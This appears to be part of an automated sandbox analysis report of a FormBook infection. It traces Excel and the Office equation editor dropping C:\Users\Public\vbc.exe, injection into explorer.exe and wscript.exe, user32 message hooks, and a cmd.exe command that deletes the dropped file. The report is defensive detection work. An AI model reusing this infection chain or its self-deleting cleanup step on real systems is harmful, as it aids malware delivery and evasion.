                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                      X-Powered-By: Nginx
                                                                                                                                      Date: Thu, 26 Nov 2020 08:02:17 GMT
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                      Data Ascii: 3


                                                                                                                                      Code Manipulations

                                                                                                                                      User Modules

                                                                                                                                      Hook Summary

                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                                                                      GetMessageWINLINEexplorer.exe
                                                                                                                                      GetMessageAINLINEexplorer.exe

                                                                                                                                      Processes

                                                                                                                                      Process: explorer.exe, Module: USER32.dll
                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                                                                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6

                                                                                                                                      Statistics

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      Analysis Process: EXCEL.EXE PID: 2248 Parent PID: 584

                                                                                                                                      General

                                                                                                                                      Start time:08:59:57
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                      Imagebase:0x13ff30000
                                                                                                                                      File size:27641504 bytes
                                                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 2736 Parent PID: 584

                                                                                                                                      General

                                                                                                                                      Start time:09:00:17
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:543304 bytes
                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Analysis Process: vbc.exe PID: 2816 Parent PID: 2736

                                                                                                                                      General

                                                                                                                                      Start time:09:00:20
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                      Imagebase:0xe90000
                                                                                                                                      File size:399360 bytes
                                                                                                                                      MD5 hash:E54D832CB872B7DC086AB7A7878D38FB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 31%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Analysis Process: vbc.exe PID: 2484 Parent PID: 2816

                                                                                                                                      General

                                                                                                                                      Start time:09:00:21
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                                                                      Imagebase:0xe90000
                                                                                                                                      File size:399360 bytes
                                                                                                                                      MD5 hash:E54D832CB872B7DC086AB7A7878D38FB
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      Reputation:low

                                                                                                                                      Analysis Process: explorer.exe PID: 1388 Parent PID: 2484

                                                                                                                                      General

                                                                                                                                      Start time:09:00:24
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                      File size:3229696 bytes
                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Analysis Process: wscript.exe PID: 268 Parent PID: 1388

                                                                                                                                      General

                                                                                                                                      Start time:09:00:37
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                      Imagebase:0x4f0000
                                                                                                                                      File size:141824 bytes
                                                                                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      Reputation:high

                                                                                                                                      Analysis Process: cmd.exe PID: 2228 Parent PID: 268

                                                                                                                                      General

                                                                                                                                      Start time:09:00:41
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                      Imagebase:0x4aaa0000
                                                                                                                                      File size:302592 bytes
                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >